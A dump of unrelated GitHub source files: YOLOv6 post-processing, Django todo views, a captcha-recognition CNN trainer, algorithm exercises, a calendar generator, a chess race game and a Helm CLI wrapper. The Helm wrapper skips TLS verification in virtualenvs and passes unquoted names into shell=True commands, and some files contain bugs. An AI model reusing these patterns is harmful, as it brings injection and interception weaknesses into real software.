x.shape[0]:\n continue\n\n # confidence multiply the objectness\n x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf\n\n # (center x, center y, width, height) to (x1, y1, x2, y2)\n box = xywh2xyxy(x[:, :4])\n\n # Detections matrix's shape is (n,6), each row represents (xyxy, conf, cls)\n if multi_label:\n box_idx, class_idx = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T\n x = torch.cat((box[box_idx], x[box_idx, class_idx + 5, None], class_idx[:, None].float()), 1)\n else: # Only keep the class with highest scores.\n conf, class_idx = x[:, 5:].max(1, keepdim=True)\n x = torch.cat((box, conf, class_idx.float()), 1)[conf.view(-1) > conf_thres]\n\n # Filter by class, only keep boxes whose category is in classes.\n if classes is not None:\n x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]\n\n # Check shape\n num_box = x.shape[0] # number of boxes\n if not num_box: # no boxes kept.\n continue\n elif num_box > max_nms: # excess max boxes' number.\n x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence\n\n # Batched NMS\n class_offset = x[:, 5:6] * (0 if agnostic else max_wh) # classes\n boxes, scores = x[:, :4] + class_offset, x[:, 4] # boxes (offset by class), scores\n keep_box_idx = torchvision.ops.nms(boxes, scores, iou_thres) # NMS\n if keep_box_idx.shape[0] > max_det: # limit detections\n keep_box_idx = keep_box_idx[:max_det]\n\n output[img_idx] = x[keep_box_idx]\n if (time.time() - tik) > time_limit:\n print(f'WARNING: NMS cost time exceed the limited {time_limit}s.')\n break # time limit exceeded\n\n return output\n\n\n\n\n","repo_name":"augmentedstartups/AS-One","sub_path":"asone/detectors/yolov6/yolov6/utils/yolov6_utils.py","file_name":"yolov6_utils.py","file_ext":"py","file_size_in_byte":9628,"program_lang":"python","lang":"en","doc_type":"code","stars":534,"dataset":"github-code","pt":"72"} +{"seq_id":"6405545577","text":"from django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response \nfrom django.http import JsonResponse \nfrom .models import Todo\nfrom .serialaizers import TodoSerializer\n@api_view(['GET'])\ndef Todoview(request):\n todos = Todo.objects.all()\n serializer =TodoSerializer(todos, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef TodoDetail(request,pk):\n todo = Todo.objects.get(id=pk)\n serializer = TodoSerializer(todo, many=False)\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef TodoCreate(request):\n serializer = TodoSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef TodoUpdate(request,pk):\n todo = Todo.objects.get(id=pk)\n serializer = TodoSerializer(instance=todo, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\n\ndef TodoDelete(request,pk):\n todo = Todo.objects.get(id=pk)\n todo.delete()\n return Response(\"Item succesfully deleted\")","repo_name":"Kiash254/django-react","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34538663098","text":"import sys\nimport os\nimport glob\nimport json\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.model_selection\n\nfrom utils.data_utils import get_iaga_data, get_omni_data\n\nBUCKETS = 100\nLENGTH = 600\nLAG = 1\n\ndef get_sequences(df, length, lag):\n _df = df.copy()\n _df['cluster'] = (_df['seconds'].diff() != 60).cumsum()\n f = _df.groupby(['cluster']).apply(lambda x: x[:len(x)-length-lag]['index']).reset_index(drop=True)\n t = _df.groupby(['cluster']).apply(lambda x: x[length+lag:]['index']).reset_index(drop=True)\n \n assert (t-f).max() == (t-f).min() == (length+lag)\n\n return list(zip(f, t))\n\npath = sys.argv[1]\nprint(f'loading from path {path}')\n\ndates, data, features = get_iaga_data(path, load_data=False)\n\ndf = pd.DataFrame()\ndf['seconds'] = dates\ndf['dates'] = pd.to_datetime(df['seconds'], unit='s', errors='coerce')\n\ndf['index'] = range(len(df))\nbucket_size = len(df)//BUCKETS\ndf['bucket'] = (((df['index']%bucket_size)==0) & (df['index'] > 0)).cumsum()\n\ntrain, test_val = sklearn.model_selection.train_test_split(list(range(BUCKETS+1)), train_size=0.8)\ntest, val = sklearn.model_selection.train_test_split(test_val, train_size=0.5)\n\ndf.loc[df['bucket'].isin(train), 'split'] = 'train'\ndf.loc[df['bucket'].isin(test), 'split'] = 'test'\ndf.loc[df['bucket'].isin(val), 'split'] = 'val'\n\ntrain_df = df.loc[df['split'] == 'train']\ntest_df = df.loc[df['split'] == 'test']\nval_df = df.loc[df['split'] == 'val']\n\n# make sure omni and iaga have the same dates\n# test if it maches omni\nfor year in pd.unique(df['dates'].dt.year):\n print(f'testing {year}')\n omni = get_omni_data(\"data_local/omni/sw_data.h5\", year=f'{year}')\n assert len(df.loc[df['dates'].dt.year==year]) == len(omni)\nprint('testing done')\n\ntrain_idx = get_sequences(train_df, LENGTH, LAG)\ntest_idx = get_sequences(test_df, LENGTH, LAG)\nval_idx = get_sequences(val_df, LENGTH, LAG)\n\nwith open('train.txt', 'w') as f: \n json.dump({\n \"length\": LENGTH,\n \"lag\": LAG,\n \"years\": pd.unique(df['dates'].dt.year).tolist(),\n \"idx\": train_idx,\n }, f)\n\nwith open('test.txt', 'w') as f: \n json.dump({\n \"length\": LENGTH,\n \"lag\": LAG,\n \"years\": pd.unique(df['dates'].dt.year).tolist(),\n \"idx\":test_idx\n }, f)\n\nwith open('val.txt', 'w') as f: \n json.dump({\n \"length\": LENGTH,\n \"lag\": LAG,\n \"years\": pd.unique(df['dates'].dt.year).tolist(),\n \"idx\": val_idx\n }, f)","repo_name":"ptigas/geoeffectivenet","sub_path":"scripts/prepare_splits.py","file_name":"prepare_splits.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21216021148","text":"#coding=utf-8\n\nimport tensorflow as tf\nfrom PIL import Image\nimport numpy as np\nimport argparse\nfrom tensorflow.python.framework.errors_impl import NotFoundError\nfrom trainForward import forward\nimport os\nfrom ErrorClass import TestException,TrainException\nimport random\nfrom config import args\n\nclass Train:\n\n def __init__(self,args):\n self.args=args\n self.train_images_list = os.listdir(args.PATH_TRAIN)\n self.test_images_list = os.listdir(args.PATH_TEST)\n self.train_len=len(os.listdir(args.PATH_TRAIN))\n self.test_len = len(os.listdir(args.PATH_TEST))\n\n def img2gray(self,path,filename):\n \"\"\"\n 描述:将图片转换为灰度图 并且返回图片的数组形式\n :param img:\n :return:\n \"\"\"\n img_file = os.path.join(path, filename)\n img=np.array(Image.open(img_file))\n if img.shape[2]==3:\n r, g, b = img[:, :, 0], img[:, :, 1], img[:, :, 2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n return gray.reshape(self.args.IMG_H,self.args.IMG_W,self.args.IMG_C)\n else:\n return img.reshape(self.args.IMG_H,self.args.IMG_W,self.args.IMG_C)\n\n def text2OneHot(self,text):\n \"\"\"\n 描述:将文本转换为onehot数组\n :param text:\n :return:\n \"\"\"\n length=len(text)\n if len(text)!=self.args.MAX_CAPTCHA:\n return TrainException(\"验证码不符合长度要求\")\n # 4*36\n vector = np.zeros(shape=self.args.MAX_CAPTCHA*self.args.CHAR_LEN)\n for i, item in enumerate(text):\n index=self.args.CHAR_LEN*i\n index=index+self.args.CHAR_SET.index(item)\n vector[index]=1\n return vector\n\n def getBatch(self,batch,is_train=True):\n \"\"\"\n 获取批量的训练数据\n :return:\n \"\"\"\n # 128 * 100 * 60 * 1\n #batch_labels=[]\n batch_inputs=np.zeros(shape=[self.args.BATCH_SIZE,self.args.IMG_H,self.args.IMG_W,self.args.IMG_C],dtype=np.float32)\n batch_labels=np.zeros(shape=[self.args.BATCH_SIZE,self.args.CHAR_LEN*self.args.MAX_CAPTCHA],dtype=np.float32)\n #最大批次\n max_batch=int(self.args.STEPS/self.args.BATCH_SIZE)\n\n if max_batch<1:\n return TrainException(\"训练或测试图片太少,不够一个批次的!\")\n if batch > max_batch-1:\n batch=batch%max_batch\n\n a_index=batch*self.args.BATCH_SIZE\n b_index=(batch+1)*self.args.BATCH_SIZE\n if is_train==True:\n if a_index > self.train_len:\n a_index = a_index - self.train_len\n b_index = b_index - self.train_len\n else:\n if a_index>self.test_len:\n a_index=a_index-self.test_len\n b_index=b_index-self.test_len\n thisBatch=[]\n if is_train==True:\n thisBatch=self.train_images_list[a_index:b_index]\n else:\n thisBatch==self.train_images_list[a_index:b_index]\n for i ,filename in enumerate(thisBatch):\n inputs=self.img2gray(self.args.PATH_TRAIN,filename)\n label = self.text2OneHot(filename.split('_')[1])\n batch_inputs[i, :, :, :] = inputs / 255\n batch_labels[i, :] = label\n return batch_labels, batch_inputs\n\n def getBatchTest(self):\n \"\"\"\n 获取批量的训练数据\n :return: labels, inputs\n \"\"\"\n batch_inputs = np.zeros(shape=[self.args.BATCH_SIZE, self.args.IMG_H, self.args.IMG_W, self.args.IMG_C],dtype=np.float32)\n # 128 * 144\n batch_labels = np.zeros(shape=[self.args.BATCH_SIZE, self.args.CHAR_LEN * self.args.MAX_CAPTCHA],dtype=np.float32)\n if len(self.test_images_list)>> \".format(i))\n print(\"[训练集] 字符准确率为 {:.5f} 图片准确率为 {:.5f} >>> loss {:.10f}\".format(acc_char, acc_img, cost_))\n\n # 基于验证集的测试\n batch_label_verify, batch_input_verify = self.getBatchTest()\n acc_char,acc_img = sess.run([accuracy_char_count,accuracy_image_count],\n feed_dict={inputs: batch_input_verify,y_labels: batch_label_verify, is_train: False})\n #print(\"第{}次训练 >>> \".format(step))\n print(\"[验证集] 字符准确率为 {:.5f} 图片准确率为 {:.5f} >>> loss {:.10f}\".format(acc_char, acc_img, cost_))\n # 准确率达到99%后保存并停止\n if acc_char > 0.99:\n saver.save(sess, self.args.PATH_MODEL)\n print(\"验证集准确率达到99%,保存模型成功\")\n break\n # 每训练500轮就保存一次\n if i % 500 == 0:\n saver.save(sess, self.args.PATH_MODEL)\n print(\"定时保存模型成功\")\n step += 1\n saver.save(sess, self.args.PATH_MODEL)\n\ntrain=Train(args)\ntrain.train()\n\n\n","repo_name":"mr-zhouzhouzhou/VerificationCode","sub_path":"code/Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":8050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14771566714","text":"#Program Requirements:\n#Return the number of min \n#inserts/deletes/adds to change \n#string A (first input) into \n#string B (second input).\na = \"\"\nb = \"\"\nmax = 9999999\nmemo = [[]]\ncost = [0,1,1,1] #Array is Skip, Delete, Insert, Replace\ndef dist():\n\tglobal a,b,max,memo,cost\n\tfor i in range(len(a)):\n\t\tfor j in range(len(b)):\n\t\t\tif i == 0 and j == 0: #Starting with empty string compared to an empty string\n\t\t\t\tmemo[i][j] = 0\n\t\t\telse:\n\t\t\t\tif i == 0: #Inserting to an empty string\n\t\t\t\t\tmemo[i][j] = memo[i][j-1]+cost[2]\n\t\t\t\telif j == 0: #Deleting to an empty string\n\t\t\t\t\tmemo[i][j] = memo[i-1][j]+cost[1]\n\t\t\t\telse:\n\t\t\t\t\tif a[i] == b[j]: #Skiping\n\t\t\t\t\t\tmemo[i][j] = memo[i-1][j-1]\n\t\t\t\t\telse:\n\t\t\t\t\t\tmemo[i][j] = min((memo[i-1][j]+cost[1]),(memo[i][j-1]+cost[2]),(memo[i-1][j-1]+cost[3]))\n\ndef main():\n\tglobal a, b, max, memo, cost\n\tfor _ in range(int(input())):\n\t\ta = \" \" + input()\n\t\tb = \" \" + input()\n\t\tmemo = [[max for y in range(len(a))] for x in range(len(b))]\n\t\tdist()\n\t\tprint(memo[len(a)][len(b)])\nmain()","repo_name":"backpack5689/Competition-Programming-Class","sub_path":"Dynamic Programming/StringCorrection.py","file_name":"StringCorrection.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20539009928","text":"#User function Template for python3\n\nclass Solution:\n \"\"\"\n m - puzzle \n x - row \n y - column\n n - size of puzzle \n v - visited array\n s - solution string\n \"\"\"\n # determines whether a given coordinate x, y is safe or not\n def isSafe(self, m, x, y, n, v):\n if (x < n and x >= 0) and (y < n and y >= 0):\n if m[x][y] == 1 and v[x][y] != 1:\n return True\n return False \n \n def solve(self, m, x, y, n, v, s, ans):\n # check if start is zero\n if m[0][0] == 0:\n return ans\n\n # append string in ans if end of puzzle is reached \n if x == n - 1 and y == n - 1:\n ans.append(s)\n return\n\n # DLRU moves\n i = [x + 1, x, x, x - 1]\n j = [y, y - 1, y + 1, y]\n moves = [\"D\", \"L\", \"R\", \"U\"]\n # setting visited as true \n v[x][y] = 1\n for a in range(4):\n if self.isSafe(m, i[a], j[a], n, v):\n self.solve(m, i[a], j[a], n, v, s + moves[a], ans) \n \n # backtracking\n v[x][y] = 0 \n \n\n def findPath(self, m, n):\n # visited array\n v = [[0 for i in range(n)] for i in range(n)]\n\n # ans array to keep track of all answers \n ans = []\n\n # solving the puzzle \n self.solve(m, 0, 0, n, v, \"\", ans)\n return ans\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__=='__main__':\n t = int(input())\n for i in range(t):\n n = list(map(int, input().strip().split()))\n arr = list(map(int, input().strip().split()))\n \n matrix = [[0 for i in range(n[0])]for j in range(n[0])]\n k=0\n for i in range(n[0]):\n for j in range(n[0]):\n matrix[i][j] = arr[k]\n k+=1\n ob = Solution()\n result = ob.findPath(matrix, n[0])\n print(result)\n# result.sort()\n# if len(result) == 0 :\n# print(-1)\n# else:\n# for x in result:\n# print(x,end = \" \")\n# print()\n# # } Driver Code Ends","repo_name":"OsafAliSayed/DSA","sub_path":"Backtracking/ratinmaze.py","file_name":"ratinmaze.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40852351335","text":"from jinja2 import Template\nimport calendar\nimport os\n\nFOLDER_NAME = '5_semester'\nmonth_names = ['იანვარი', 'თებერვალი', 'მარტი', 'აპრილი', 'მაისი', 'ივნისი', 'ივლისი', 'აგვისტო', 'სექტემბერი', 'ოქტომბერი', 'ნოემბერი', 'დეკემბერი']\nyear = 2023 # start year\nmonth = 9 # start month\nn, max_n = -2, 20 # range for n\n\ndef get_year_and_month(year, month):\n months_sum = year * 12 + month - 1\n return months_sum // 12, months_sum % 12 + 1\n\n\nhtml_cal = calendar.HTMLCalendar(firstweekday = 0)\n\nwith open('./template.html', 'r', encoding='utf-8') as f:\n t = Template(f.read())\n\nif not os.path.isdir(FOLDER_NAME):\n os.makedirs(FOLDER_NAME)\n\nfor month_count in range(9):\n y, m = get_year_and_month(year, month + month_count)\n rows = html_cal.formatmonth(y, m).split('\\n')[3:-2]\n\n content = {\n 'month': f'{month_names[m-1]} {y}',\n 'row_height': 660//len(rows),\n 'table': ''}\n for line in rows:\n content['table'] += f'\\t\\t\\t{line[:4]} {n if 0 < n <= max_n else \"\"} {line[4:]}\\n'\n n += 1\n else:\n if 'noday' in line:\n n -= 1\n content['table'] = content['table'][:-1]\n \n # print(t.render(**content))\n\n with open(f'./{FOLDER_NAME}/{y}_{m}.html', 'w', encoding='utf-8') as f:\n f.write(t.render(**content))\n","repo_name":"datotoda/calendar_generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"ka","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"2547695440","text":"# Author: Cory Apperson\n# GitHub username: appersoncory\n# Date: 08/17/2023\n# Description: A game played on a chess board, where the players race their kings to the top row.\n\nclass ChessRaceGame:\n def __init__(self):\n \"\"\"Initializes the game, creating the board,setting the starting player, and game state,\"\"\"\n self._board = {\n # Use a dictionary to represent the board, since each space can only have one piece.\n 'a1': 'WK', 'b1': 'WB', 'c1': 'WN', 'd1': None, 'e1': None, 'f1': 'BN', 'g1': 'BB', 'h1': 'BK',\n 'a2': 'WR', 'b2': 'WB', 'c2': 'WN', 'd2': None, 'e2': None, 'f2': 'BN', 'g2': 'BB', 'h2': 'BR',\n 'a3': None, 'b3': None, 'c3': None, 'd3': None, 'e3': None, 'f3': None, 'g3': None, 'h3': None,\n 'a4': None, 'b4': None, 'c4': None, 'd4': None, 'e4': None, 'f4': None, 'g4': None, 'h4': None,\n 'a5': None, 'b5': None, 'c5': None, 'd5': None, 'e5': None, 'f5': None, 'g5': None, 'h5': None,\n 'a6': None, 'b6': None, 'c6': None, 'd6': None, 'e6': None, 'f6': None, 'g6': None, 'h6': None,\n 'a7': None, 'b7': None, 'c7': None, 'd7': None, 'e7': None, 'f7': None, 'g7': None, 'h7': None,\n 'a8': None, 'b8': None, 'c8': None, 'd8': None, 'e8': None, 'f8': None, 'g8': None, 'h8': None\n }\n self._turn_color = \"WHITE\"\n self._game_state = \"UNFINISHED\"\n self._white_pending_win = False\n\n def get_board(self):\n \"\"\"Returns the current chess board\"\"\"\n return self._board\n\n def get_turn_color(self):\n \"\"\"Gets the color whose turn it is\"\"\"\n return self._turn_color\n\n def set_turn_color(self, color):\n \"\"\"Sets the turn to the given color\"\"\"\n self._turn_color = color\n\n def get_game_state(self):\n \"\"\"Returns the state of the game, e.g. 'UNFINISHED', 'WHITE_WON' \"\"\"\n return self._game_state\n\n def set_game_state(self, state):\n \"\"\"Sets the state of the game, e.g. 'UNFINISHED', 'WHITE_WON' \"\"\"\n self._game_state = state\n\n def get_white_pending_win(self):\n \"\"\"Returns whether the white player has a king in the top row, pending a win\"\"\"\n return self._white_pending_win\n\n def set_white_pending_win(self, state):\n \"\"\"Sets whether the white player has a king in the top row, pending a win\"\"\"\n self._white_pending_win = state\n\n def is_valid_move(self, start, end):\n \"\"\"Determines if a move is valid.\"\"\"\n\n piece = self.get_board()[start]\n\n if not piece:\n return False # No piece at the start position\n\n color = \"WHITE\" if piece[0] == \"W\" else \"BLACK\"\n\n if color != self.get_turn_color():\n return False # Wrong player's turn\n\n if self.get_board()[end]:\n if self.get_board()[start][0] == self.get_board()[end][0]:\n return False # Destination has a piece of the same color\n\n # Call the corresponding method for each piece type\n if piece[1] == \"K\":\n valid = self.is_valid_king_move(start, end)\n elif piece[1] == \"R\":\n valid = self.is_valid_rook_move(start, end)\n elif piece[1] == \"N\":\n valid = self.is_valid_knight_move(start, end)\n elif piece[1] == \"B\":\n valid = self.is_valid_bishop_move(start, end)\n else:\n valid = False\n\n if valid:\n # Temporarily make the move and check for check status\n captured_piece = self._board[end]\n self.get_board()[end] = piece\n self.get_board()[start] = None\n is_white_in_check = self.is_king_in_check(\"WHITE\")\n is_black_in_check = self.is_king_in_check(\"BLACK\")\n # Revert the move\n self.get_board()[start] = piece\n self.get_board()[end] = captured_piece\n\n if is_white_in_check or is_black_in_check:\n return False # Can't make a move that puts own king in check\n\n return valid\n\n def is_valid_move_ignoring_checks(self, start, end):\n \"\"\"Determines if a move is valid, ignoring possible king checks. Used when determining possible king checks.\"\"\"\n\n piece = self.get_board()[start]\n # Call the corresponding method for each piece type\n if piece[1] == \"K\":\n valid = self.is_valid_king_move(start, end)\n elif piece[1] == \"R\":\n valid = self.is_valid_rook_move(start, end)\n elif piece[1] == \"N\":\n valid = self.is_valid_knight_move(start, end)\n elif piece[1] == \"B\":\n valid = self.is_valid_bishop_move(start, end)\n else:\n valid = False\n\n return valid\n\n # Placeholder methods for individual piece move validations\n def is_valid_king_move(self, start, end):\n \"\"\"Return true if this is a valid move for the king\"\"\"\n\n # Get column and row for start and end\n start_col, start_row = ord(start[0]) - ord('a'), int(start[1])\n end_col, end_row = ord(end[0]) - ord('a'), int(end[1])\n\n # Check if the destination is a neighboring square\n col_diff = abs(start_col - end_col)\n row_diff = abs(start_row - end_row)\n\n # The king can move to any of its 8 neighboring squares\n if col_diff > 1 or row_diff > 1:\n return False\n\n return True\n\n def is_valid_rook_move(self, start, end):\n \"\"\"Return true if this is a valid move for the rook\"\"\"\n\n current_board = self.get_board()\n start_col, start_row = ord(start[0]) - ord('a'), int(start[1])\n end_col, end_row = ord(end[0]) - ord('a'), int(end[1])\n\n # Check if the move is either horizontal or vertical\n if start_col != end_col and start_row != end_row:\n return False # Rook can't move diagonally\n\n # Check if there's any piece in between the start and end squares\n if start_row == end_row: # Horizontal move\n step = 1 if start_col < end_col else -1\n for col in range(start_col + step, end_col, step):\n if current_board[chr(col + ord('a')) + str(start_row)]:\n return False # There's a piece blocking the path\n else: # Vertical move\n step = 1 if start_row < end_row else -1\n for row in range(start_row + step, end_row, step):\n if current_board[start[0] + str(row)]:\n return False # There's a piece blocking the path\n\n return True\n\n def is_valid_knight_move(self, start, end):\n \"\"\"Return true if this is a valid move for the knight\"\"\"\n\n current_board = self.get_board()\n start_col, start_row = ord(start[0]) - ord('a'), int(start[1])\n end_col, end_row = ord(end[0]) - ord('a'), int(end[1])\n\n col_diff = abs(start_col - end_col)\n row_diff = abs(start_row - end_row)\n\n # Check for the \"L\" shaped move of the knight\n if (col_diff == 2 and row_diff == 1) or (col_diff == 1 and row_diff == 2):\n return True\n\n return False\n\n def is_valid_bishop_move(self, start, end):\n \"\"\"Return true if this is a valid move for the bishop\"\"\"\n\n current_board = self.get_board()\n start_col, start_row = ord(start[0]) - ord('a'), int(start[1])\n end_col, end_row = ord(end[0]) - ord('a'), int(end[1])\n\n col_diff = abs(start_col - end_col)\n row_diff = abs(start_row - end_row)\n\n # Check for diagonal movement\n if col_diff != row_diff:\n return False\n\n col_step = 1 if start_col < end_col else -1\n row_step = 1 if start_row < end_row else -1\n\n current_col, current_row = start_col + col_step, start_row + row_step\n\n # Check for any pieces in the path\n while current_col != end_col and current_row != end_row:\n if current_board[chr(current_col + ord('a')) + str(current_row)]:\n return False # There's a piece blocking the path\n current_col += col_step\n current_row += row_step\n\n return True\n\n def is_king_in_check(self, color):\n \"\"\"Determines if the king of the specified color is in check.\"\"\"\n\n current_board = self.get_board()\n\n # Finding the king's position based on the color\n king_position = None\n for pos, piece in current_board.items():\n if piece:\n if color == \"WHITE\" and piece[0] == \"W\":\n if piece[1] == \"K\":\n king_position = pos\n break\n elif color == \"BLACK\" and piece[0] == \"B\":\n if piece[1] == \"K\":\n king_position = pos\n break\n\n # Check if any of the opponent's pieces can make a valid move to the king's position\n for pos, piece in current_board.items():\n if piece:\n if (piece[0] == \"W\" and color == \"BLACK\") or (piece[0] == \"B\" and color == \"WHITE\"): # Opponent's piece\n # Temporarily set the piece at the king's position to None to allow capturing move check\n target_piece = current_board[king_position]\n current_board[king_position] = None\n if self.is_valid_move_ignoring_checks(pos, king_position):\n # Reset the piece at the king's position and return True\n current_board[king_position] = target_piece\n print(\"Can't move here, would put king in check.\")\n return True\n # Reset the piece at the king's position\n current_board[king_position] = target_piece\n return False\n\n def make_move(self, start, end):\n \"\"\"Moves the piece from the first position to the second position, checking for winners and changing turn.\"\"\"\n\n if self.get_game_state() != \"UNFINISHED\":\n return False\n\n if not self.is_valid_move(start, end):\n return False\n\n # move piece and capture if necessary\n self.get_board()[end] = self.get_board()[start]\n self.get_board()[start] = None\n\n # update game state\n # Check if the moved piece was a King, and if it was moved to the top row.\n if self.get_board()[end][1] == \"K\" and end[1] == \"8\":\n if self.get_turn_color() == \"WHITE\": # White moved king to the top, they are about to win.\n self.set_white_pending_win(True)\n else:\n if self.get_white_pending_win(): # Black moved king to the top\n self.set_game_state(\"TIE\") # Check if white's king is at the top, for a tie.\n else:\n self.set_game_state(\"BLACK_WON\") # Otherwise, black wins\n\n # switch turn\n self.set_turn_color(\"BLACK\") if self.get_turn_color() == \"WHITE\" else self.set_turn_color(\"WHITE\")\n\n # If it just became white's turn, and white is pending a win, and\n # black hasn't won, white wins.\n if self.get_white_pending_win() and self.get_game_state() == \"UNFINISHED\" and self.get_turn_color() == \"WHITE\":\n self.set_game_state(\"WHITE_WON\")\n\n return True\n\n # Optional print board function for debugging\n def print_board(self):\n \"\"\"Prints the current board state with column labels at the bottom and row labels on the left.\"\"\"\n\n for i in range(8, 0, -1): # Start from the top row (8th) and go downwards\n row = [str(i)] # Start each row with its row number\n for j in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']:\n position = j + str(i)\n piece = self.get_board()[position]\n row.append(piece if piece else \"..\")\n print(\" \".join(row))\n\n # After printing all rows, print the column labels at the bottom\n print(\" a b c d e f g h\")\n\n\ndef main():\n game = ChessRaceGame()\n print(\"Welcome to Chess Racing!\")\n game.print_board()\n\n while game.get_game_state() == \"UNFINISHED\":\n start_pos = input(f\"{game.get_turn_color()}'s turn. Enter start position (e.g. 'a2'): \")\n end_pos = input(f\"Enter end position (e.g. 'a3'): \")\n\n if game.make_move(start_pos, end_pos):\n game.print_board()\n else:\n print(\"Invalid move. Please try again.\")\n\n game_state = game.get_game_state()\n if game_state != \"UNFINISHED\":\n if game_state == \"TIE\":\n print(\"It's a tie!\")\n else:\n print(f\"{game_state.replace('_', ' ')}!\")\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"appersoncory/ChessRace","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3661662193","text":"import os\nimport subprocess\nimport requests\nimport shlex\n\nfrom requests.auth import HTTPBasicAuth\nfrom ruamel.yaml import YAML\nfrom ruamel.yaml.comments import CommentedMap\nfrom packaging import version\n\nfrom .kubernetes import KubernetesClient\n\n\ndef flatten_values(values, prefix=''):\n data = []\n for key, value in values.items():\n label = '%s.%s' % (prefix, key) if prefix else key\n comment = values.ca.get(key, 2)\n if type(values[key]) == CommentedMap:\n data += flatten_values(values[key], label)\n else:\n data.append({'label': label,\n 'default': value,\n 'type': 'int' if type(value) == int else 'str',\n 'help': comment.value.lstrip('#').strip() if comment else ''})\n return data\n\ndef unflatten_values(data):\n values = {}\n for item in data:\n value_dict = values\n key = item['label']\n while '.' in key:\n prefix, key = key.split('.', 1)\n if prefix not in value_dict.keys():\n value_dict[prefix] = {}\n value_dict = value_dict[prefix]\n value_dict[key] = int(item['value']) if ('type' in item.keys() and item['type'] == 'int') else item['value']\n return values\n\nclass HelmLocalRepoClient(object):\n def __init__(self, repo_name, repo_path):\n self._repo_name = repo_name\n self._repo_path = repo_path\n\n def _load_yaml(self, yaml_path):\n if not os.path.isfile(yaml_path):\n return None\n try:\n with open(yaml_path, 'rb') as f:\n return YAML().load(f)\n except:\n return None\n\n def list(self, latest_only=True):\n result = {}\n for chart_path in [os.path.join(d.path, 'Chart.yaml') for d in os.scandir(self._repo_path) if d.is_dir()]:\n chart_info = self._load_yaml(chart_path)\n if not chart_info:\n continue\n result[chart_info['name']] = chart_info\n\n return result\n\n def values(self, name):\n chart_name = os.path.join(self._repo_path, name)\n return chart_name, self._load_yaml(os.path.join(chart_name, 'values.yaml'))\n\nclass HelmRemoteRepoClient(object):\n def __init__(self, repo_name, repo_url, repo_username='admin', repo_password=''):\n self._repo_name = repo_name\n self._repo_url = repo_url\n self._repo_auth = HTTPBasicAuth(repo_username, repo_password) if repo_password else None\n\n def _request(self, method, url, **kwargs):\n kwargs.setdefault('verify', False if os.environ.get('VIRTUAL_ENV') else True) # XXX Do not verify if running in virtual environment.\n kwargs.setdefault('timeout', 30)\n response = requests.request(method, url, **kwargs)\n response.raise_for_status()\n return response\n\n def _get(self, path, params={}):\n response = self._request('get', '%s/%s' % (self._repo_url, path.lstrip('/')), auth=self._repo_auth, params=params)\n return YAML(typ='safe').load(response.text)\n\n def _local_repo_list(self):\n command = 'helm repo list -o yaml'\n try:\n result = subprocess.check_output(command, shell=True)\n return YAML(typ='safe').load(result)\n except:\n return []\n\n def _local_repo_add(self):\n command = 'helm repo add %s --username=%s --password=%s %s %s' % ('--insecure-skip-tls-verify' if os.environ.get('VIRTUAL_ENV') else '', # XXX Do not verify if running in virtual environment.\n self._repo_auth.username,\n shlex.quote(self._repo_auth.password),\n self._repo_name,\n self._repo_url)\n subprocess.check_output(command, shell=True)\n\n def _local_repo_update(self):\n command = 'helm repo update %s' % self._repo_name\n subprocess.check_output(command, shell=True)\n\n def list(self, latest_only=True):\n result = self._get('index.yaml')\n if not latest_only:\n return result['entries']\n return {name: max(versions, key=lambda x: version.parse(x['version'])) for name, versions in result['entries'].items()}\n\n def values(self, name):\n if not next((repo for repo in self._local_repo_list() if repo['name'] == self._repo_name), None):\n self._local_repo_add()\n self._local_repo_update()\n\n chart_name = '%s/%s' % (self._repo_name, name)\n command = 'helm show values %s %s' % ('--insecure-skip-tls-verify' if os.environ.get('VIRTUAL_ENV') else '', # XXX Do not verify if running in virtual environment.\n chart_name)\n result = subprocess.check_output(command, shell=True)\n return chart_name, YAML().load(result)\n\nclass HelmClient(object):\n def __init__(self, kubernetes_client=None):\n self.kubernetes_client = kubernetes_client if kubernetes_client else KubernetesClient()\n\n def list(self, namespace):\n command = 'helm list -o yaml -n %s' % namespace\n result = subprocess.check_output(command, shell=True)\n releases = YAML().load(result)\n for release in releases:\n del(release['updated']) # We already have this as a datetime object.\n return releases\n\n def values(self, namespace, name):\n command = 'helm get values -o yaml -n %s %s' % (namespace, name)\n result = subprocess.check_output(command, shell=True)\n return YAML().load(result)\n\n def install(self, namespace, name, chart_name, values_file, wait=True, timeout='20m'):\n command = 'helm upgrade -i %s %s %s -n %s -f %s %s %s' % ('--insecure-skip-tls-verify' if os.environ.get('VIRTUAL_ENV') else '', # XXX Do not verify if running in virtual environment.\n '--atomic --wait' if wait else '',\n ('--timeout %s' % timeout) if timeout else '',\n namespace,\n values_file,\n name,\n chart_name)\n 